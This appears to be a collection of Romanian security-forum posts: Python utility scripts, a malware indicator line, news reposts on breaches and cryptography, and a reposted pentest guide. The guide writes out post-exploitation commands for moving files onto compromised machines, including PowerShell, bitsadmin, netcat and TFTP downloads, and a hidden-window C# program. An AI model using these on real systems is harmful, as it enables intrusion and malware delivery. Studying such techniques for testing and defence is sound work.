Usr6

Poate fi inclus la inceputul oricarui script python ce utilizeaza module care nu sunt instalate default. Pentru instalarea modulelor lipsa foloseste pip. Momentan disponibil doar pentru sistemul de operare windows & python 2.7 import sys import os ####################################### # RST Self installing missing modules # # Usr6 # ####################################### #pentru ca uneori numele modulului difera de numele pachetului: librarie = {"modul":"nume pachet", "bs4":"beautifulsoup4"} def install_module(e): module = str(e).split()[-1] raw_input("Lipseste modulul %s, apasa Enter pentru a incerca instalarea lui automata..." %module) if os.name == "nt": if not os.path.isfile('C:\\Python27\\Scripts\\pip.exe'): sys.exit("N-ai pip, n-ai noroc. Il gasesti aici: https://pypi.python.org/pypi/pip") os.system ('C:\\Python27\\Scripts\\pip.exe install "%s"' %(librarie[module])) #restarting script os.system('echo restarting... && %s "%s"' %(sys.executable, sys.argv[0])) sys.exit() elif os.name =="linux": sys.exit('%s ..."inca" NU, trebuie sa instalezi manual pachetul %s \ngoogle is your friend' %(os.name, librarie[module])) else: sys.exit('%s ..."inca" NU, trebuie sa instalezi manual pachetul %s \ngoogle is your friend' %(os.name, librarie[module])) try: #import module externe from bs4 import BeautifulSoup except Exception as d41d8cd98f00b204e9800998ecf8427e: install_module(d41d8cd98f00b204e9800998ecf8427e) #your script start here print """ ### ### ### # # # # ### ### # ## # # # # ### #forums""" raw_input("Press Enter/Return to exit...") sys.exit()

bebegbg.no-ip.org 2606 HKCU\Software\Microsoft\Windows\CurrentVersion\Run taskmgr Windows Command Processor Microsoft Corporation C:\documents and settings\Usr7\local settings\temp\taskmgr\taskmgr.exe a fost 2/54 https://www.virustotal.com/en/file/38c73d346f9da12a69c54c3665c3ef4172fc14eaa01b54a1904b1cae0124cbbb/analysis/1403683358/

#!/usr/bin/env python import sys import os import random import argparse print """ ################################# # Rst Almost secure file eraser # # Usr6 # #################################""" parser = argparse.ArgumentParser(description="RST Almost secure file eraser") parser.add_argument("input", metavar="path/file", help="sterge fisierul") parser.add_argument("-m", "--maxstr", metavar="nr", default = 3000000, help="cati octeti vor fi scrisi la fiecare trecere") args = parser.parse_args() def aleator(l): print random.choice("~*&^%$#@!"), variabila = '' for i in range(l): variabila += random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890') return variabila def writefile(fisier, drepturi, nr): with open(fisier, drepturi) as handle: handle.write(aleator(nr)) handle.close size = os.path.getsize(args.input) print args.input, size, args.maxstr ask = raw_input("Esti sigur ca vrei sa-l stergi definitiv?(y/n): ") if ask != "Yes" and ask != "YES" and ask != "yes" and ask != "Y" and ask != "y": sys.exit("Nu am sters nimic") if size <= int(args.maxstr): writefile(args.input, "wb", size) else: writefile(args.input, "wb", int(args.maxstr)) size -= int(args.maxstr) while size !=0: if size <= int(args.maxstr): writefile(args.input, "ab", size) break else: writefile(args.input, "ab", int(args.maxstr)) size -= int(args.maxstr) if not os.remove(args.input): print "\n%s deleted" %(args.input) sys.exit(raw_input("press enter...")) utilizare: file_eraser.py filename help: file_eraser.py -h adaugare in context menu(click dreapta):regedit HKEY_CLASSES_ROOT/*/shell New key: Eraser (Default) REG_SZ Eraser... HKEY_CLASSES_ROOT/*/shell/Eraser New key: command (Default) REG_SZ python C:\\Python27\\file_eraser.py "%1"

1. Descarcam Latest Versions | Virus Removal Tool | Kaspersky Lab Version 11 (11.0.0.1245) 2. Executam "setup_11.0.1.1245.x01_2014_06_19_11_26.exe" si il lasam sa se dezarhiveze, sa-si faca updateurile, etc. pana apare "I accept ..." 3. Cre?m in C:\ un director nou "Kaspersky" 4. In Local Settings\Temp\ gasim 2 directoare care ne intereseaza "RarSFX0" si unul din multe cifre, in cazul meu "2874282" Din "RarSFX0" mutam directorul Drivers in C:\Kaspersky\ Din cifre copiem tot continutul in C:\Kaspersky 5. In C:\Kaspersky, unul din executabile e de forma 3594572.exe -pentru a scana din cli un fisier 3594572.exe scan fisier.exe Adaugarea optiunii de scan in meniul(click dreapta) oricarui fisier: UPDATE: pentru a putea scana corect fisirele care contin spatii in nume, in poza de mai jos e: C:\Kaspersky\3594572.exe scan "%1" pas cu pas: How to Add Any Application Shortcut to Windows Explorer’s Context Menu All File Types meniu pentru drive scan How to Add or Remove Entries from Context Menus in Windows? - AskVG Rezultatul final: click dr pe fisierul suspect>Kaspersky scan *face update la semnaturi inainte de a scana fisierul //LE @bcman, daca redenumesti fisierul, nu mai functioneaza p.s. la scanare, daca scrisul apare si dispare repede, inseamna ca fisierul este curat. Daca este infectat apare optiunea de stergere, ca in poza de mai sus.

HP has unveiled its revolutionary supercomputer, The Machine. The all-in-one device – a server, workstation, PC and phone – uses photonic memory and is portable, potentially opening doors to a more powerful, energy-efficient global computer industry. The Machine will be able to hand vast quantities of data using far less electricity, HP claims, adding that its system will be six times more powerful than existing servers and require 80 times less energy. According to HP, today the IT industry uses as much energy as is used by all of Japan to run the immense volumes of data stored in public clouds alone, so this technology will save the energy produced by several nuclear power plants worldwide. However exciting, the project is still under development and the company isn’t expecting to produce its first prototypes until 2015. The first devices equipped with The Machine are not scheduled to be released until 2018. The new data transfer system will be based on silicon photonics to transmit data, as an alternative to copper wires, using lasers that are just 1/4 the diameter of a human hair. HP promises it will boost the speed of the system whilst reducing energy requirements. To operate The Machine, the company has invented a new type of memory called “memristors,” which are fast, allow permanent storage even if the power is cut off and are designed to replace current storage devices. HP claims The Machine is capable of managing 160 petabytes in 250 nanoseconds. The device’s main difference is that it will be operating clusters of specialized cores while today’s computers operate much smaller numbers of generalized cores. This is seen as the key for the Internet of Things future network, which will bundle together all digitalized knowledge and make it accessible and usable by devices such as The Machine. HP’s chief technology officer, Martin Fink, said The Machine’s technology could already be scaled down to be used in smartphones, which could eventually lead to making handheld devices with 100 terabytes of memory. When released, the Machine is expected to replace a data center’s worth of equipment with a single refrigerator-size device. Naturally, The Machine won’t be able to use any of the existing operational systems, so it will require HP to develop a new OS capable of operating mass data volumes in no time. Although it was only recently unveiled at Hewlett-Packard's Discover customer event in Las Vegas, the development has already been criticized by Dell, another US computer technology company, who called the attempt "laughable." “The notion that you can reach some magical state by rearchitecting an OS is laughable on the face of it,” John Swainson, president of software at Dell, told journalists in San Francisco, adding that "the basic elements of computing, like processor and memory, are likely to be reconfigured in some way, but not so radically that existing software won’t run." HP is much more optimistic, placing high hopes in The Machine. Saying it will not be just for huge supercomputers, the company promises its new technology could be used in smaller devices such as smartphones and laptops. It already sees a variety of future applications, from business to medicine, for The Machine. “Your doctor could compare your symptoms and genomics with every other patient around the world to improve your health outcomes, instantly, without language barriers or privacy breaches,” HP says. The company said its device will also address data governance and security issues in an effort to better protect information. Sursa: Supercomputer revolution: Meet HP’s The Machine – an all-in-one, mega-powerful photonic device — RT News

indeed, script updated #!/usr/bin/env python import os import sys import hashlib print """ ############################# # Rst Duplicate file finder # # Usr6 # ############################# #nytro edition* #*are la baza fallen edition """ biblioteca = {} librarie = {} def hashfile(afile): ##### #http://www.pythoncentral.io/hashing-files-with-python/ ##### BLOCKSIZE = 65536 hasher = hashlib.md5() with open(afile, "rb") as afile: buf = afile.read(BLOCKSIZE) while len(buf) > 0: hasher.update(buf) buf = afile.read(BLOCKSIZE) return hasher.hexdigest() def fileparsing(root): for root, subFolders, files in os.walk(root): for file in files: fullpath = os.path.join(root, file) try: file_size = str(os.path.getsize(fullpath)) if file_size not in biblioteca.keys(): biblioteca[file_size] = [fullpath] else: listapath = biblioteca[file_size] +[fullpath] biblioteca[file_size] = listapath print fullpath except Exception as bug: with open("bugs.txt", "a")as handle: handle.write(str(bug) + "\n") handle.close pass root = raw_input("Enter start dir: ") if os.path.isdir(root): fileparsing(root) else: while not os.path.isdir(root) and root != "exit": print "Mai incearca o data sau 'exit' + enter to Exit" root = raw_input("Enter start dir: ") if root != "exit": fileparsing(root) else: sys.exit("Out!") print "Filtram rezultatele:" for f_size in biblioteca.keys(): if len(biblioteca[f_size]) >1: for f_path in biblioteca[f_size]: try: md5hash = hashfile(f_path) if md5hash not in librarie.keys(): librarie[md5hash] = [f_path] else: listapath = librarie[md5hash] +[f_path] librarie[md5hash] = listapath print f_path except Exception as bug: with open("bugs.txt", "a")as handle: handle.write(str(bug) + "\n") handle.close pass print "Scriu rezultatele finale in fisierul 'duplicate.txt'" for md5_ in librarie.keys(): if len(librarie[md5_]) >1: with open("duplicate.txt", "a") as handle: handle.write(str(md5_) + "\n") for f_path in librarie[md5_]: handle.write("\t\t" + str(os.path.getsize(f_path))+ "\t"+ str(f_path) +"\n") handle.close() print "\nRezultate:" print "Buguri:", "bugs.txt" if os.path.isfile("bugs.txt") else "N-am gasit" print "Duplicate: ", "duplicate.txt" if os.path.isfile("duplicate.txt") else "N-am gasit" sys.exit("Out!")

Daca tii tu neaparat... #!/usr/bin/env python import os import sys import hashlib print """ ############################# # Rst Duplicate file finder # # Usr6 # ############################# #fallen edition """ biblioteca = {} def hashfile(afile): ##### #http://www.pythoncentral.io/hashing-files-with-python/ ##### BLOCKSIZE = 65536 hasher = hashlib.md5() with open(afile, "rb") as afile: buf = afile.read(BLOCKSIZE) while len(buf) > 0: hasher.update(buf) buf = afile.read(BLOCKSIZE) return hasher.hexdigest() def fileparsing(root): for root, subFolders, files in os.walk(root): for file in files: fullpath = os.path.join(root, file) try: md5hash = hashfile(fullpath) if md5hash not in biblioteca.keys(): biblioteca[md5hash] = [fullpath] else: listapath = biblioteca[md5hash] +[fullpath] biblioteca[md5hash] = listapath print fullpath except Exception as bug: with open("bugs.txt", "a")as handle: handle.write(str(bug) + "\n") handle.close pass root = raw_input("Enter start dir: ") if os.path.isdir(root): fileparsing(root) else: while not os.path.isdir(root) and root != "exit": print "Mai incearca o data sau 'exit' + enter to Exit" root = raw_input("Enter start dir: ") if root != "exit": fileparsing(root) else: sys.exit("Out!") for md5_ in biblioteca.keys(): if len(biblioteca[md5_]) >1: with open("duplicate.txt", "a") as handle: handle.write(str(md5_) + "\n") for f_path in biblioteca[md5_]: handle.write("\t\t" + str(os.path.getsize(f_path))+ "\t"+ str(f_path) +"\n") handle.close() print "\nRezultate:" print "Buguri:", "bugs.txt" if os.path.isfile("bugs.txt") else "N-am gasit" print "Duplicate: ", "duplicate.txt" if os.path.isfile("duplicate.txt") else "N-am gasit" sys.exit("Out!")

Dupa cum sugereaza si titlul, cauta toate fisierele dumplicate din calculator + anexe si le scrie in fisierul duplicate.txt sub forma: md5 file size1 cale fisier file size2 cale fisier etc. pentru ca md5 nu mai este considerat 100% sigur, nici nezultatele oferite de acest script nu pot avea o acuratete 100%, @fallen_angel a fost suficient de norocos incat sa dea peste un collision in timpul testelor ar trebui sa functioneze fara probleme pe orice sistem windows/*unix/+ubuntu ce are instalat python 2.7 #!/usr/bin/env python import os import sys import hashlib print """ ############################# # Rst Duplicate file finder # # Usr6 # ############################# """ alfabet =["a","b","c","d","e","f","g","h","i","j","k","l","m", "n","o","p","q","r","s","t","u","v","w","x","y","z"] biblioteca = {} def hashfile(afile): ##### #http://www.pythoncentral.io/hashing-files-with-python/ ##### BLOCKSIZE = 65536 hasher = hashlib.md5() with open(afile, "rb") as afile: buf = afile.read(BLOCKSIZE) while len(buf) > 0: hasher.update(buf) buf = afile.read(BLOCKSIZE) return hasher.hexdigest() def fileparsing(root): for root, subFolders, files in os.walk(root): for file in files: fullpath = os.path.join(root, file) try: md5hash = hashfile(fullpath) if md5hash not in biblioteca.keys(): biblioteca[md5hash] = [fullpath] else: listapath = biblioteca[md5hash] +[fullpath] biblioteca[md5hash] = listapath print fullpath except Exception as bug: with open("bugs.txt", "a")as handle: handle.write(str(bug) + "\n") handle.close pass #sys.platform for i in alfabet: root = i + ":\\" if os.path.isdir(root): fileparsing(root) else: fileparsing("/") for md5_ in biblioteca.keys(): if len(biblioteca[md5_]) >1: with open("duplicate.txt", "a") as handle: handle.write(str(md5_) + "\n") for f_path in biblioteca[md5_]: handle.write("\t\t" + str(os.path.getsize(f_path))+ "\t"+ str(f_path) +"\n") handle.close() print "\nRezultate:" print "Buguri:", "bugs.txt" if os.path.isfile("bugs.txt") else "N-am gasit" print "Duplicate: ", "duplicate.txt" if os.path.isfile("duplicate.txt") else "N-am gasit"

Actiune de amploare a politistilor si procurorilor DIICOT Timisoara, cu ajutorul agentilor FBI, pentru prinderea unor tineri acuzati de fraude informatice care au dus la ‘curatarea’ a sute de conturi ale unor americani. Loviturile erau puse la cale din Romania, via Rusia, Pakistan si Statele Unite ale Americii. Zeci de perchezitii au loc in aceasta dimineata la adrese din Timisoara, din Arad, dar si din judetele Mehedinti si Caras-Severin. Anchetatorii vorbesc de o retea de infractori informatici care au pus la punct o metoda spectaculoasa prin care, de-a lungul a 6 ani s-au furat datele a mii de carduri bancare. Practic, mai multi tineri romani au creat un program informatic prin care au reusit sa fure informatii de pe cel putin 6.000 de carti de credit, au vandut apoi datele la bucata in Rusia, Pakistan si SUA, iar din banii obtinuti, si-au cumparat case si masini de lux. Vorbim de una dintre cele mai importante grupari de infractori cibernetici din Romania. Cum functiona reteaua? Potrivit anchetatorilor, filiera actiona inca din anul 2008. Romanii din grupare au creat un program informatic care depista vulnerabilitatile mai multor sisteme de plata. Plasau programul pe internet si descopereau unde POS-urile nu erau bine securizate. Majoritatea s-au dovedit a fi in restaurante, fast-food-uri si benzinarii din America. Odata identificate restaurantele ori statiile de carburanti, se trecea la faza a doua a operatiunii. Un alt program, de tip keylogger (un program care lucreaza in background, de cele mai multe ori nefiind sesizat de menagerul de sistem si care inregistreaza toate apasarile de taste care se executa, iar informatiile sunt puse intr-un fisier), era introdus in computerele care coordonau POS-urile, fara ca utilizatorii sa banuiasca ceva. In momentul in care se facea o plata cu cardul, acest program inregistra fara gres numarul de cont si parola clientului. In timp, se intocmeau liste cu datele cardurilor bancare, ce ajungeau la capii retelei din Romania, 5 tineri, care, mai apoi, NU scoteau banii, ci vindeau informatiile unor indivizi din SUA, Pakistan si Rusia, care plateau foarte bine pentru ele. Acestia le trimiteau romanilor banii prin serviciul Moneygram, in transe, pentru ca sumele sa nu bata la ochi. Strainii care cumparau informatiile din Romania se ocupau mai apoi de clonarea cartilor de credit si scoteau diverse sume din conturile americanilor. Banii incasati pentru datele vandute in Rusia, Pakistan sau SUA, erau ‘spalati’ de romani, care cumparau case, apartamente sau masini scumpe. ‘Afacerea’ a ajuns insa in vizorul agentilor FBI, care au inceput cercetarile si au si audiat deja mai multe persoane in America. De asemenea, Biroul Federal de Investigatii a solicitat informatii de la 109 banci care au confirmat retragerile de bani din conturile oamenilor via Rusia, Pakistan sau Statele Unite. Ancheta s-a extins, astfel ca agentii FBI au cerut ajutorul si procurorilor DIICOT Timisoara pentru prinderea membrilor filierei romanesti. 22 de perchezitii au loc in aceasta dimineata: 2 in Timisoara, 6 in Arad, 13 in judetul Mehedinti si una in judetul Caras Severin. Potrivit anchetatorilor, printre capii retelei romanesti se numara Dinu Melcioiu, Robert Vargatu, Cristian Istodor si Andrei Velici. Tinerii vor fi cercetati pentru infractiuni informatice, spalare de bani si asociere in vederea comiterii de infractiuni. Cu totii risca ani grei de inchisoare. Sursa: » Ancheta FBI la Timisoara! Perchezitii DIICOT la tineri acuzati de lovituri informatice spectaculoase in SUA. Vezi o metoda stralucita prin care s-au furat date si s-au golit mii de carduri bancare! Opinia Timisoarei – Stiri din Timisoara cu

Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files. There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will covered in this blog. PowerShell file download Visual Basic file download Perl file download Python file download Ruby file download PHP file download or upload FTP file download TFTP file download Bitsadmin file download Wget file download Netcat file download Windows share file download Notepad dialog box file download Exe to Text, Text to EXE with PowerShell and Nishang Csc.exe to compile from source file Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file. PowerShell File Download PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet: $p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:\%homepath%\file") To execute this script, run the following command in a PowerShell window: PS C:\> .\test.ps1 Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command: C:\>powershell set-executionpolicy unrestricted Visual Basic File Download The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite larger than the PowerShell one. Set args = Wscript.Arguments Url = "http://domain/file" dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", Url, False xHttp.Send with bStrm .type = 1 ' .open .write xHttp.responseBody .savetofile " C:\%homepath%\file", 2 ' end with Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above. To execute this script, run the following command in a command shell: C:\>cscript test.vbs The following four languages are non-native to windows machines. However, if you find a machine with any of these languages installed on them (regardless of the OS), you can leverage these scripts to download files. Perl File Download Perl is an extremely versatile scripting language that can be used for almost anything. Using Perl makes it super easy to download files onto the local host. #!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file"); To execute this script, run the following command in a command shell: root@kali:~# perl test.pl Python File Download Python is a general purpose scripting language that emphasizes code readability. As with most scripting languages, the goal is to write less code than needed for a programming language, while still accomplishing the intended task. #!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close() To execute this script, run the following command in a command shell: root@kali:~# python test.py Ruby File Download Ruby is an object-oriented programming language that can be used for many things from creating frameworks (think Metasploit) to simple tasks such as downloading files. #!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } } To execute this script, run the following command in a command shell: root@kali:~# ruby test.rb PHP File Download PHP is usually a server-side scripting language used for web development, but can also be used as a general purpose scripting language. #!/usr/bin/php <?php $data = @file("http://example.com/file"); $lf = "local_file"; $fh = fopen($lf, 'w'); fwrite($fh, $data[0]); fclose($fh); ?> To execute this script, run the following command in a command shell: root@kali:~# php test.php The remaining ways to move files onto a target machine are through native operating system functions unless otherwise noted. Some of these require more steps than others, but can be used in different scenarios to bypass certain restrictions. FTP File Download For this method, an attacker would want to echo the FTP commands to a bash script since it generally requires user interaction to input a username and password. This bash script can then be run to have all the steps ran without the need for interaction. ftp 127.0.0.1 username password get file exit TFTP File Download Trivial FTP comes by default in Windows Vista and below. Note that you will have to set up the corresponding server to connect to. It can be run using the following command: tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server Bitsadmin File Download Bitsadmin is a command-line tool for windows that allows a user to create download or upload tasks. bitsadmin /transfer n http://domain/file c:\%homepath%\file Wget File Download Wget is a Linux and Windows tool that allows for non-interactive downloads. wget http://example.com/file Netcat File Download Netcat can allow for downloading files by connecting to a specific listening port that will pass the contents of a file over the connection. Note that this example is Linux specific. On the attackers computer, type: cat file | nc -l 1234 This will print the contents of the file to the local port 1234. Then, whenever someone connects to that port, the contents of the file will be sent to the connecting IP. The following command should be run on the machine the attacker is targeting: nc host_ip 1234 > file This will connect the target to the attacker's computer and receive the file that will be sent over the connection. Windows Share File Download Windows shares can be mounted to a drive letter, and files can then be copied over by subsequent copy commands. To mount a remote drive, type: net use x: \\127.0.0.1\share /user:example.com\userID myPassword Notepad Dialog Box File Download If you have access (RDP, physical, etc.) to a machine, but your user permissions do not allow you to open a web browser, this is a trick you can use to quickly download a file from a URL or a Universal Naming Convention (UNC) path. This also works well when you are breaking out of a locked-down application being run on a terminal. Open notepad Go to file - open In the File Name box near the bottom, type in the full URL path to your file Notepad is kind enough to go out and grab the contents of this file for you. Exe to Txt, and Txt to Exe with PowerShell and Nishang This is possibly one of my favorite tools to use when trying to move an exe to a machine. Nishang allows you to convert an exe to hex, then reassemble the hex into the original exe using PowerShell. I have seen group policies that do not allow for the transfer of exes through the RDP clipboard. Although it provides basic protection, it (sometimes) still allows the ability to copy text through the clipboard. In this scenario, you would be able to copy across the Nishang PowerShell source to a file on the box and rename the extension to .ps1. The Nishang script you want to copy is TexttoExe.ps1, and it is only 8 lines long. You can download Nishang here. To convert the exe to a hex file, type: PS > .\ExetoText.ps1 evil.exe evil.txt Open the evil.txt file and copy the contents. Then paste the contents to the target machine using the RDP clipboard. Do the same with the contents of the TexttoExe.ps1 file in Nishang. To convert the hex file back to an exe, type: PS > .\TexttoExe.ps1 evil.text evil.exe This will result in your evil exe being successfully moved to the target machine. Csc.exe to Compile Source from a File C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity. The default location for this executable is the following: C:\Windows\Microsoft.NET\Framework\version Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory. This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code. public class Evil { public static void Main() { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; startInfo.FileName = "cmd.exe"; startInfo.Arguments = "/C net users > C:\\Temp\\users.txt"; process.StartInfo = startInfo; process.Start(); } } To compile your source code, type: csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs Wrap up Hopefully this blog has given you viable options for getting your files (malicious or otherwise) over to a server. Sursa: https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file

Ancient cryptography Explore how we have hidden secret messages through history. What is cryptography? The Caesar cipher Caesar Cipher Exploration Frequency Fingerprint Exploration Polyalphabetic cipher Polyalphabetic Exploration The one-time pad Perfect Secrecy Exploration Frequency stability Frequency stability exploration Coin flip sequences The Enigma encryption machine Perfect secrecy Pseudorandom number generators Random Walk Exploration Modern cryptography A new problem emerges in the 20th century. What happens if Alice and Bob can never meet to share a key in the first place? The fundamental theorem of arithmetic Public key cryptography: What is it? The discrete logarithm problem Diffie-hellman key exchange RSA encryption: Step 1 RSA encryption: Step 2 RSA encryption: Step 3 Time Complexity (Exploration) Euler's totient function Euler Totient Exploration RSA encryption: Step 4 What should we learn next? Ciphers Learn about algorithms for performing encryption & decryption. Then practice making and breaking codes! Ciphers vs. codes Shift cipher Caesar cipher encryption Caesar cipher decryption Caesar cipher frequency analysis Vigenere cipher encryption XOR bitwise operation XOR and the one-time pad XOR exploration Bitwise operators What's next? Modular arithmetic This is a system of arithmetic for integers. These lessons provide a foundation for the mathematics presented in the Modern Cryptography tutorial. What is modular arithmetic? Modulo operator Congruence modulo Congruence relation Equivalence relations The quotient remainder theorem Modular addition and subtraction Modular addition Modular multiplication Modular multiplication Modular exponentiation Fast modular exponentiation Fast Modular Exponentiation Modular inverses The Euclidean Algorithm Primality test Why do Primes make some problems fundamentally hard? Build machines to perform primality tests! Introduction Primality test challenge Trial division Running time Level 2: measuring running time Computer memory (space) Binary memory exploration Algorithmic efficiency Level 3: Challenge Sieve of Eratosthenes Level 4: Sieve of Eratosthenes Primality test with sieve Level 5: Trial division using sieve The prime number theorem Prime density spiral Prime Gaps Time space tradeoff Summary (what's next?) Randomized algorithms Would access to coin flips speed up a primality test? How would this work? Randomized algorithms (intro) Conditional probability warmup Guess the coin Random primality test (warm up) Level 9: Trial Divison vs Random Division Fermat's little theorem Fermat primality test Level 10: Fermat Primality Test Link: https://www.khanacademy.org/computing/computer-science/cryptography

More than 1.2 million account credentials from Origin, the popular Electronic Arts game-platform, have been leaked online, according to an announcement made by the hackers. The Origin client is the exclusive game-selling platform from all EA games. The leak contained 1.218.229 emails and plain text password of Origin users. “Origin has been breached by #UGLegion,” the hackers said. “-37MB’s of ORIGIN Users; – 1.2million in total.” Or particular significance is that the Origin client also has a payment section that could easily be populated with payment details. The credit card payment section usually contains credit card numbers, credit card security code (CSC) or credit card verification value (CVV), expiration dates, and names, addresses and phone numbers. It can also contain a linked PayPal account for payment processing. In a separate development the UGLegion hackers group also announced a leak of close to a million emails that are linked to Facebook. “Facebook has been deemed, Greedy,” the hackers said. “1million emails – breached from Facebook.” This may be the biggest leak that Electronic Arts has suffered since launching the Origin Platform in June, 2011. Sursa: Origin Client Database Breached by Hackers; 1.2 Million Accounts and Passwords Leaked | HOTforSecurity

In these chapters, you’ll find everything you need to win your next CTF competition: Walkthroughs and details on past CTF challenges Guidance to help you design and create your own toolkits Case studies of attacker behavior, both in the real world and in past CTF competitions https://trailofbits.github.io/ctf/

Un script simplu pentru "criptare", in python 2.7. dictionar = {"a": "1", "b": "2", "c": "3", "d": "4", "e": "5", "f": "6", "g": "7", "h": "8", "i": "9", "j": "~", "k": "!", "l": "@", "m": "#", "n": "$", "o": "%", "p": "^", "q": ":", "r": "&", "s": "*", "t": "+", "u": "=", "v": "|", "w": "_", "x": ".", "y": ",", "z": "0", " ": "`", "?":">"} text = "salut ce faci?" textcriptat = "" for i in text: if i in dictionar.keys(): textcriptat += dictionar else: print "n-am gasit inlocuitor pentru: " + str(i) print textcriptat

Agen?ia Na?ional? de Securitate (NSA) strânge un num?r uria? de imagini din comunica?iile pe care le intercepteaz? prin intermediul opera?iunilor sale de supraveghere pentru a le folosi în programe sofisticate de recunoa?tere facial?, relateaz? New York Times, în edi?ia electronic?. Încrederea agen?iei în tehnologia de recunoa?tere facial? a crescut în mod semnificativ în ultimii patru ani, în timp ce NSA s-a îndreptat c?tre noi software pentru a exploata numeroasele imagini incluse în email-uri, mesaje telefonice, re?ele de socializare, videoconferin?e sau alte comunica?ii, potrivit unor documente secrete. Agen?ia intercepteaz? "milioane de imagini pe zi" care se traduc într-un "extraordinar poten?ial neexploatat", potrivit documentelor din 2011 ob?inute de fostul consultant Edward Snowden. În timp ce alt?dat? se concentra pe comunica?ii scrise ?i verbale, NSA ia acum în considerare imaginile faciale, amprentele sau alte elemente de identificare la fel de importante pentru misiunea sa de urm?rire a suspec?ilor de terorism ?i a altor ?inte ale serviciilor de informa?ii, arat? documentele. O prezentare Power Point a NSA din 2011, de exemplu, arat? câteva fotografii cu un b?rbat neidentificat - uneori cu barb?, alteori ras - în diferite cadre, al?turi de peste 20 de seturi de informa?ii despre el, cum ar fi dac? a fost pe lista intedic?iilor de zbor a Administra?iei pentru Securitatea Transporturilor, statusul pa?aportului sau al vizei sale, asocia?i cunoscu?i sau suspecta?i de leg?turi teroriste ?i comentarii despre el f?cute de informatorii agen?iilor de informa?ii americane. Nu se ?tie cu exactitate câte persoane din lume ?i câ?i americani ar fi fost viza?i de aceste tehnici. Nici legile federale ?i nici cele la nivel de stat nu ofeor? protec?ie specific? pentru imaginile faciale. Având în vedere misiunile NSA de informa?ii externe, multe dintre aceste imagini ar implica persoane din afara Statelor Unite ale c?ror date au fost adunate prin conect?ri la cablurile de transport, noduri de Internet ?i transmisiuni prin satelit. Deoarece agen?ia consider? imaginile o form? de con?inut de comunicare, NSA ar trebui s? cear? aprobarea unui tribunal pentru imaginile americanilor colectate prin programele sale de supraveghere, la fel ca pentru citirea email-urilor lor sau interceptarea conversa?iilor telefonice, potrivit unei purt?toare de cuvânt a NSA. Comunica?iile interna?ionale în care un american ar putea trimite o imagine cuiva urm?rit de agen?ie peste grani?? ar putea fi scutite de aceste prevederi. Ap?r?torii libert??ilor civile ?i al?i critici sunt îngrijora?i c? îmbun?t??irea tehnologiei, folosit? de guvern ?i industrie, ar putea afecta via?a privat?. "Recunoa?terea facial? poate fi foarte invaziv?", a declarat Alessandro Acquisti, cercet?tor în tehnologia recunoa?terii faciale la Carnegie Mellon University. "Înc? sunt limit?ri tehnice în aceast? privin??, dar puterea folosirii computerelor cre?te, bazele de date cresc, iar algoritmii continu? s? se îmbun?t??easc?". Sursa: NSA adun? milioane de imagini de pe Internet pentru a le folosi în programe de recunoa?tere facial? - Mediafax

+ = http://i.imgur.com/cHbQKWS.png

Learn, build and test regular expressions: RegExr: Learn, Build, & Test RegEx

Crypto researchers are preparing to scatter the ashes of a class of Discrete Logarithm Problems (DLPs) as the future of security, following a claim by Swiss researchers to have cracked a 128-bit crypto scheme in two hours. So as not to frighten the horses, The Register will start by pointing out that our understanding of this paper at Arxiv doesn't mean the schemes you're now using have been broken. Rather, the work by researchers at EPFL in Switzerland excludes crypto based on “supersingular curves” from future consideration. As the Lausanne-based polytechnic states in its media release, “Whereas it was believed that it would take 40,000 times the age of the universe for all computers on the planet to do it”, the supersingular curve DLP algorithm only lasted two hours on the 24-core cluster used to crack it. Authored by Robert Granger and Thorsten Kleinjung of EPFL's LACAL (Laboratory for Cryptologic Algorithms) and Jens Zumbrägel of TU Dresden, the paper says this about the cracking of supersingular curves: “When initially proposed, these fields were believed to be 128-bit secure, and even in light of the recent algorithmic advances, were believed to be 128-bit and 94.6-bit secure. On the contrary, we have shown that the former field has only59 bits of security and we have implemented a total break of the latter. Since asymptotically more efficient techniques can be brought to bare as bit lengths increase, we conclude that small characteristic pairings at all security levels should now be regarded as completely insecure.” Their results are to be presented at IACR Crypto 2014 conference. ® Sursa: 128-bit crypto scheme allegedly cracked in two hours • The Register

